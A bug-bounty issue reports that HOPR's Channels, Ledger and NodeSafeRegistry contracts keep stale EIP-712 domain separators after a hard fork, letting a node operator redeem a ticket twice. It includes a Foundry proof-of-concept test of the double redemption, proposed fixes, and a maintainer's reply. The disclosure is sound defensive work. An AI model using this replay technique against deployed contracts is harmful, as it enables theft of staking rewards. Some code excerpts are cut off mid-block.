hats-finance / SafeStaking-by-HOPR-0x607386df18b663cf5ee9b879fbc1f32466ad5a85

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Domain separators are susceptible to replay attacks, ticket rewards can be claimed twice #17

Open hats-bug-reporter[bot] opened 1 year ago

hats-bug-reporter[bot] commented 1 year ago

Github username: @0xfuje Submission hash (on-chain): 0xf9626ce34861c300afafbce036ca9d3a9b1860c8c651f8fbacec316607545b1a Severity: high



Winning tickets can be redeemed for rewards twice, functions can use incorrect domain separator


In case of a hard fork a malicious node operator can claim his ticket rewards twice via Channels.sol - redeemTicket(). The root of the problem is that updateDomainSeparator() does not entirely prevent replay attacks when a hard fork happens because:

  1. it's a public function, BUT none of the functions that use domainSeparator verify block.chainid it is up to date
  2. it can be front-runned by the attacker on both chains to cause a replay attack
  3. the attacker can simply redeem on both chains before anyone calls updateDomainSeparator() since none of the functions call it

Channels.sol - updateDomainSeparator()

    function updateDomainSeparator() public {
        // following encoding guidelines of EIP712
        bytes32 newDomainSeparator = keccak256(
                keccak256("EIP712Domain(string name,string version,uint256 chainId,address verifyingContract)"),

        if (newDomainSeparator != domainSeparator) {
            domainSeparator = newDomainSeparator;
            emit DomainSeparatorUpdated(domainSeparator);

A smart attacker can plan ahead on the news of a planned hard-fork and accumulate as much redeemable tickets as possible and setup a front-running bot to double claim his rewards before updateDomainSeparator() is called.

Other vulnerable contracts

Rather then sending a different report, I decided to mention here that other contracts are vulnerable as well, however their impact is not as significant and can be classified at most medium or low severity

Ledger.sol - updateLedgerDomainSeparator()

While redeeming a ticket in Channel.sol - redeemInternal() will index events with the not yet up to date ledgerDomainSeparator -> indexEvent() will save a snapshot with the incorrect latestRoot.rootHash since it hashes ledgerDomainSeparator

NodeSafeRegistry.sol - updateDomainSeparator()

registerSafeWithNodeSig() - node can theoretically register a safe on both chains with the same signature

Proof of Concept

  1. navigate to packages/ethereum/contracts/test/Channels.t.sol
  2. copy and paste the below proof of concept inside HoprChannelsTest contract
  3. run forge test --match-test testHardForkDoubleRedeem -vvvv

    function testHardForkDoubleRedeem(
        uint256 privKeyA,
        uint256 privKeyB,
        address safeContract,
        uint256 porSecret,
        uint96 channelAmount,
        uint96 amount,
        uint48 maxTicketIndex,
        uint32 indexOffset,
        uint24 epoch,
        uint48 channelTicketIndex
                                    SETUP START
        porSecret = bound(porSecret, 1, HoprCrypto.SECP256K1_FIELD_ORDER - 1);
        privKeyA = bound(privKeyA, 1, HoprCrypto.SECP256K1_FIELD_ORDER - 1);
        privKeyB = bound(privKeyB, 1, HoprCrypto.SECP256K1_FIELD_ORDER - 1);
        vm.assume(privKeyA != privKeyB);
        amount = uint96(bound(amount, MIN_USED_BALANCE, MAX_USED_BALANCE));
        channelAmount = uint96(bound(channelAmount, amount, MAX_USED_BALANCE));
        indexOffset = uint32(bound(indexOffset, 1, type(uint32).max));
        channelTicketIndex = uint48(bound(channelTicketIndex, 0, type(uint48).max - indexOffset - 1));
        maxTicketIndex = uint48(bound(maxTicketIndex, channelTicketIndex + 1, type(uint48).max - indexOffset));
        address src = vm.addr(privKeyA);
        address dest = vm.addr(privKeyB);
        vm.assume(safeContract != address(0) && safeContract != src && safeContract != dest);
        _helperTokenTransferMock(dest, amount);
        RedeemTicketArgBuilder memory args = RedeemTicketArgBuilder(
            src, dest, channelAmount, channelTicketIndex, 0, epoch, HoprChannels.ChannelStatus.OPEN
        (HoprChannels.RedeemableTicket memory redeemable, HoprCrypto.VRFParameters memory vrf) = CryptoUtils.getRedeemableTicket(args);
                            SETUP END / POC START
        // 1. hard fork happens
        uint256 hardForkTime = vm.snapshot();
        // 2. user claims winning ticket
        hoprChannels.redeemTicket(redeemable, vrf);
        // 3. switch to fork chain
        // 4. user front-runs or just redeems ticket before updateDomainSeparator() is called
        hoprChannels.redeemTicket(redeemable, vrf);
        // 5. update happens after the user redeemed his ticket

Recommended Mitigation

Double Ticket Claim

Consider making an updateDomainSeparator() call at the start of the _redeemTicketInteran() to prevent calling it with an outdated domain separator.

 function _redeemTicketInternal(
        address self,
        RedeemableTicket calldata redeemable,
        HoprCrypto.VRFParameters calldata params
+       updateDomainSeparator();    

An alternative solution that's more gas efficient, but adds a tiny bit of complexity is to only call updateDomainSeparator() in the start of _redeemTicketInternal() if the block.chainid is different than the previous chainid. To archive this, block.chainid can be saved to a storage variable chainId in updateDomainSeparator().

Ledger, NodeSafeRegistry

Choose one method from the above solutions, implement the fix in functions that use the domainSeparator. In Ledger.sol call updateLedgerDomainSeparator() at the start of indexEvent(). In NodeSafeRegistry.sol call updateDomainSeparator() at the start of registerSafeWithNodeSig(). Don't forget to do the same in Channels.sol - _getTicketHash() since it also uses domainSeparator to hash.

0xfuje commented 1 year ago

Hey @QYuQianchen, I'm curious why the medium label was removed. Thank you!

QYuQianchen commented 1 year ago

Dear @0xfuje After an internal review, we decided that the reported issue is widely applicable to the entire ecosystem and not project specific. This is a very nice infrastructure topic and we encourage you to create an EIP to raise this issue and we are happy to support further discussion.